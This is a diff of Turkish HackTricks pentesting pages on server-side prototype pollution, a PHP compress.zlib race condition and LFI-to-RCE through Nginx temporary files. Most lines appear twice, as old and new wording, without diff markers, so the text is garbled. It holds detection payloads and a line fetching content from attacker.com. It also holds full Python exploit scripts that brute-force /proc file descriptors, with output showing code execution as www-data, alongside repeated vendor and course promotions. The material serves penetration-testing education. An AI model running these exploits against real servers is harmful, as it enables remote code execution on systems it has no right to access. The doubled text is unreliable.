Ardından yansıtılan JSON şu şekilde görünecektir:
```json
{"foo": "bar"} -- Note the extra space
```
### Açığa Çıkan Başlıklar
### Açık Başlıklar
Aşağıdaki PP aracıyla sunucu, HTTP başlığını geri gönderecektir: **`Access-Control-Expose_headers: foo`**
Aşağıdaki PP cihazı sunucunun **`Access-Control-Expose_headers: foo`** HTTP başlığını geri göndermesini sağlayacaktır.
```json
{"__proto__":{"exposedHeaders":["foo"]}}
```
**CORS modülünün yüklü olması gerekmektedir**
Gerekli olan **CORS modülünün yüklü olmasıdır**
### **OPTIONS Metodu**
Aşağıdaki payload ile, bir OPTIONS yanıtından bir metodun gizlenmesi mümkündür:
Aşağıdaki yük ile bir OPTIONS yanıtından bir metodun **gizlenmesi mümkündür**:
```javascript
// Original reponse: POST,GET,HEAD
@ -79,28 +93,28 @@ Aşağıdaki PP yükü kullanılarak **döndürülen durum kodu** değiştirileb
```
### Hata
Bir dize gibi bir ilkel değerle bir prototip atadığınızda, prototipin bir nesne olması gerektiği için bir **boş işlem üretir**. `Object.prototype`'ye kendisi gibi bir prototip nesnesi atamaya çalışırsanız, bu bir **istisna fırlatacaktır**. Bu iki davranışı kullanarak, prototip kirliliğinin başarılı olup olmadığını **tespit edebiliriz**:
Bir dize gibi bir ilkel değerle bir prototip atadığınızda, prototipin bir nesne olması gerektiği için bir **boş işlem üretir**. Bir prototip nesnesini `Object.prototype`'e atamaya çalışırsanız, bu bir **istisna fırlatacaktır**. Bu iki davranışı kullanarak **prototip kirliliğinin başarılı olup olmadığını tespit edebiliriz**:
```javascript
({}).__proto__.__proto__={}//throws type exception
({}).__proto__.__proto__="x"//no-op does not throw exception
```
### Yansıtılan Değer
Bir uygulama, yanıtında bir nesne içerdiğinde, `__proto__` ile birlikte **olağandışı bir isme sahip bir özelliğin** oluşturulması bilgilendirici olabilir. Özellikle, yanıtta **yalnızca olağandışı özelliğin** döndürülmesi, uygulamanın zafiyetine işaret edebilir:
Bir uygulama yanıtında bir nesne içeriyorsa ve `__proto__` ile birlikte **olağandışı bir isme sahip bir özellik oluşturulursa**, bu durum dikkat çekici olabilir. Özellikle, yanıtta **yalnızca olağandışı özelliğin** döndürülmesi, uygulamanın zafiyetini işaret edebilir:
```json
{"unusualName":"value","__proto__":"test"}
```
Ayrıca, Lodash gibi bir kütüphane kullanılan senaryolarda, bir özelliği hem prototip kirliliği (PP) yoluyla hem de doğrudan nesnenin içine yerleştirerek başka bir teşhis yaklaşımı sunulur. Eğer bu tür bir özellik yanıttan çıkarılırsa, bu Lodash'ın birleştirmeden önce hedef nesnede özelliğin varlığını doğruladığını gösterir:
Ayrıca, Lodash gibi bir kütüphane kullanıldığında, bir özelliği hem prototip kirliliği (PP) aracılığıyla hem de doğrudan nesnenin içine ayarlamak, başka bir teşhis yaklaşımı sunar. Eğer bu tür bir özellik yanıttan çıkarılırsa, bu, Lodash'ın birleştirmeden önce hedef nesnede özelliğin varlığını doğruladığını gösterir:
```javascript
{"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
// If 'b' is the only property reflected, this indicates prototype pollution in Lodash
```
## Diğer
## Çeşitli
### Noktalara İzin Ver
Express'te, sorgu dizesi parametrelerinden nesneler oluşturmanıza izin veren bir seçenek bulunmaktadır.\
Bu seçeneği kesinlikle bir hata zincirinde kullanabilir ve bir prototip kirliliği açığından yararlanabilirsiniz.
Express'te **sorgu dizesi parametrelerinden nesneler oluşturmanıza izin veren** bir seçenek bulunmaktadır.\
Bu seçeneği kullanarak bir hata **zinciri** oluşturup bir **prototype pollution zafiyetini** sömürmekte kesinlikle kullanabilirsiniz.
```json
{"__proto__":{"allowDots":true}}
```
@ -110,16 +124,29 @@ Bu seçeneği kesinlikle bir hata zincirinde kullanabilir ve bir prototip kirlil
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin.**
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın.**
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -1,27 +1,42 @@
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## `compress.zlib://` ve `PHP_STREAM_PREFER_STDIO`
`compress.zlib://` protokolü kullanılarak açılan bir dosya, `PHP_STREAM_PREFER_STDIO` bayrağı ile aynı dosyaya daha sonra bağlantıya gelen verileri yazmaya devam edebilir.
`compress.zlib://` protokolü kullanılarak açılan bir dosya, `PHP_STREAM_PREFER_STDIO` bayrağı ile aynı dosyaya daha sonra gelen verileri yazmaya devam edebilir.
Bu, aşağıdaki gibi bir çağrı anlamına gelir:
Bu, şu gibi bir çağrı anlamına gelir:
```php
file_get_contents("compress.zlib://http://attacker.com/file")
```
Aşağıdaki kod parçasında, sunucu isteği geçerli bir HTTP yanıtıyla yanıtlayabilir, bağlantıyıık tutabilir ve daha sonra zamanla ekstra veri gönderebilir. Bu bilgiyi php-src kodunun main/streams/cast.c bölümünde görebilirsiniz.
Sunucudan http://attacker.com/file isteğinde bulunacak, sunucu isteği geçerli bir HTTP yanıtı ile yanıtlayabilir, bağlantıyıık tutabilir ve daha sonra ekstra veriler gönderebilir, bu veriler de dosyaya yazılacaktır.
Bu bilgiyi php-src kodunun main/streams/cast.c bölümünde görebilirsiniz:
```c
/* Use a tmpfile and copy the old streams contents into it */
@ -31,31 +46,42 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_temp_new();
}
```
## RCE için Yarış Koşulu
## RCE'ye Yarış Koşulu
Önceki hile kullanılarak [**bu CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) çözüldü.
[**Bu CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) önceki hile kullanılarak çözüldü.
Saldırgan, **`compress.zlib`** protokolünü kullanarak **hedef sunucunun saldırganın sunucusundan bir dosyayı okumasını sağlayacak bir bağlantı açmasını** sağlayacak.
Saldırgan, **kurban sunucunun saldırganın sunucusundan bir dosyayı okuyarak bağlantı açmasını sağlayacak** olan **`compress.zlib`** protokolünü kullanacak.
Bu **bağlantı** varken saldırgan, sunucu tarafından sızdırılan geçici dosyanın yolunu **dışarı çıkaracak**.
Bu **bağlantı** varken saldırgan, sunucu tarafından sızdırılan geçici dosyanın yolunu **dışa aktaracak**.
**Bağlantı** hala açıkken saldırgan, kontrol ettiği geçici dosyayı yükleyen bir LFI'yi **sömürecek**.
Bu **bağlantı**ıkken saldırgan, kontrol ettiği geçici dosyayı yükleyen bir LFI'ı **sömürecek**.
Ancak, web sunucusunda **`<?` içeren dosyaların yüklenmesini engelleyen bir kontrol** bulunmaktadır. Bu nedenle, saldırgan bir **Yarış Koşulu**ndan yararlanacaktır. Hala açık olan bağlantıda, **saldırgan**, web sunucusunun yasaklanmış karakterleri içeren dosyayı kontrol ettiği **SONRA PHP payload'ını GÖNDERECEKTİR** ancak **İÇERİĞİNİ yüklemeden önce**.
Ancak, web sunucusunda **`<?` içeren dosyaların yüklenmesini engelleyen bir kontrol** bulunmaktadır. Bu nedenle, saldırgan bir **Yarış Koşulu**'nu istismar edecektir. Hala açık olan bağlantıda, **saldırgan**, web sunucusunun yasaklı karakterleri içeren dosyayı kontrol ettiği **sonrasında PHP yüklemesini GÖNDERECEKTİR** ancak **içeriğini yüklemeden ÖNCE**.
Daha fazla bilgi için Yarış Koşulu ve CTF'ninıklamasını [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) adresinden kontrol edin.
Daha fazla bilgi için Yarış Koşulu ve CTF açıklamasını [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) adresinden kontrol edebilirsiniz.
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* Hacking hilelerinizi **HackTricks** ve **HackTricks Cloud** github reposuna PR göndererek paylaşın.
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -2,24 +2,38 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile</strong>!</summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Zayıf yapılandırma
**[https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) adresinden örnek**
**[Örnek https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
* PHP kodu:
```
````h`
<?php include_once($_GET['file']);
```
* FPM / PHP yapılandırması:
@ -30,15 +44,15 @@ php_admin_value[file_uploads] = 0
...
```
* Kurulum / sıkılaştırma:
```
```bash
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...
```
Neyse ki PHP şu anda genellikle PHP-FPM ve Nginx üzerinde dağıtılıyor. Nginx, istemci gövdesi (post ile sınırlı olmayan) belirli bir eşiği aşarsa geçici dosyalar yazacak olan [istemci gövdesi tamponlama](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) özelliği sunar.
Şu anda PHP genellikle PHP-FPM ve Nginx üzerinden dağıtılmaktadır. Nginx, istemci gövdesinin (post ile sınırlı olmayan) belirli bir eşiği aştığında geçici dosyalar yazacak olan kolayca gözden kaçabilen [istemci gövdesi arabellekleme](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) özelliğini sunar.
Bu özellik, Nginx'in aynı kullanıcı olarak çalıştığı durumlarda (genellikle www-data olarak yapılır) dosya oluşturma için başka bir yol olmadan LFI'ların istismar edilmesine izin verir.
Bu özellik, Nginx'in aynı kullanıcı olarak çalıştığı durumlarda (genellikle www-data olarak yapılan) PHP ile dosya oluşturma yolu olmadan LFİ'lerin istismar edilmesine izin verir.
İlgili Nginx kodu:
```c
@ -57,7 +71,7 @@ if (fd != -1 && !persistent) {
return fd;
}
```
Görülebilir ki, Nginx tarafından açıldıktan hemen sonra **tempfile hemen silinir**. Neyse ki, **silinen dosyaya hala bir referans elde etmek için procfs kullanılabilir**. Bunun için bir yarışma yapılabilir:
Görülebilir ki **temp dosyası, Nginx tarafından açıldıktan hemen sonra silinir**. Neyse ki, silinen dosyaya hala bir referans elde etmek için bir yarış kullanılabilir **procfs** aracılığıyla:
```
...
/proc/34/fd:
@ -72,9 +86,9 @@ lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```
Not: Bu örnekte `/proc/34/fd/15` doğrudan dahil edilemez çünkü PHP'nin `include` fonksiyonu yolunu `/var/lib/nginx/body/0000001368 (silinmiş)` olarak çözümleyecektir ve bu dosya sistemde mevcut değildir. Neyse ki, bu küçük kısıtlama `/proc/self/fd/34/../../../34/fd/15` gibi bazı dolaylı yollarla atlatılabilir ve sonunda silinmiş `/var/lib/nginx/body/0000001368` dosyasının içeriği çalıştırılabilir.
Not: Bu örnekte `/proc/34/fd/15` doğrudan dahil edilemez çünkü PHP'nin `include` işlevi yolunu `/var/lib/nginx/body/0000001368 (silindi)` olarak çözümleyecektir ki bu dosya sistemde mevcut değildir. Bu küçük kısıtlama neyse ki `/proc/self/fd/34/../../../34/fd/15` gibi bazı dolaylı yollarla atlatılabilir, bu da sonunda silinmiş `/var/lib/nginx/body/0000001368` dosyasının içeriğini yürütecektir.
## Tam Saldırı
## Tam Sızma
```python
#!/usr/bin/env python3
import sys, threading, requests
@ -143,36 +157,7 @@ for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, ))
a.start()
```
# Nginx Geçici Dosyaları Aracılığıyla LFI'den RCE'ye
Bu teknik, Nginx web sunucusunun geçici dosyalarının kullanılmasıyla LFI (Yerel Dosya Ekleme) saldırısından RCE'ye (Uzaktan Kod Yürütme) geçiş yapmayı amaçlamaktadır.
## Adım 1: Geçici Dosya Yolu Tespiti
İlk adım, hedef web uygulamasının Nginx sunucusunun geçici dosyalarının nerede depolandığını tespit etmektir. Bu bilgiyi elde etmek için aşağıdaki adımları izleyebilirsiniz:
1. Hedef web uygulamasına erişin.
2. Bir dosya yükleme işlemi gerçekleştirin.
3. Yükleme işlemi sırasında Nginx sunucusunun geçici dosyalarının depolandığı dizinin yolunu kontrol edin.
## Adım 2: Geçici Dosya Yolu İstismarı
Geçici dosya yolunu tespit ettikten sonra, LFI saldırısını gerçekleştirmek için bu yolun istismar edilmesi gerekmektedir. Aşağıdaki adımları izleyerek RCE elde edebilirsiniz:
1. Hedef web uygulamasında LFI açığı bulun.
2. LFI açığını kullanarak Nginx sunucusunun geçici dosyalarının içeriğini okuyun.
3. Geçici dosyalar arasında potansiyel olarak yürütülebilir bir dosya bulun.
4. Bu dosyayı hedef web uygulamasında yürütmek için LFI açığını kullanın.
## Önleme Yöntemleri
Bu saldırıyı önlemek için aşağıdaki önlemleri alabilirsiniz:
- Web uygulamanızda LFI açıklarını düzeltin ve güncelleyin.
- Nginx sunucusunun geçici dosyalarının güvenli bir şekilde depolandığı bir dizin kullanın.
- Geçici dosyaları düzenli olarak temizleyin ve gereksiz dosyaları silin.
Bu teknik, LFI saldırılarının RCE'ye dönüştürülmesi için kullanılan etkili bir yöntemdir. Ancak, yasal ve etik sınırlar içinde kullanılmalıdır.
Çıktı:
```
$ ./pwn.py 127.0.0.1 1337
[*] cpus: 2; pid_max: 32768
@ -198,7 +183,7 @@ $ ./pwn.py 127.0.0.1 1337
[+] brute loop restarted: 34
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Başka Bir Sızma Yöntemi
### Başka Bir Sızma
Bu, [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/) adresinden alınmıştır.
```python
@ -307,16 +292,28 @@ read_file_multiprocess(requests_session, nginx_pids)
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) bir **karanlık ağ** destekli arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da takip edin.**
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -4,18 +4,32 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan ileri seviyeye öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan ileri seviyeye öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
* Şirketinizi **HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** istiyorsanız [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**]'yi(https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i(https://opensea.io/collection/the-peass-family) içeren koleksiyonumuz
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
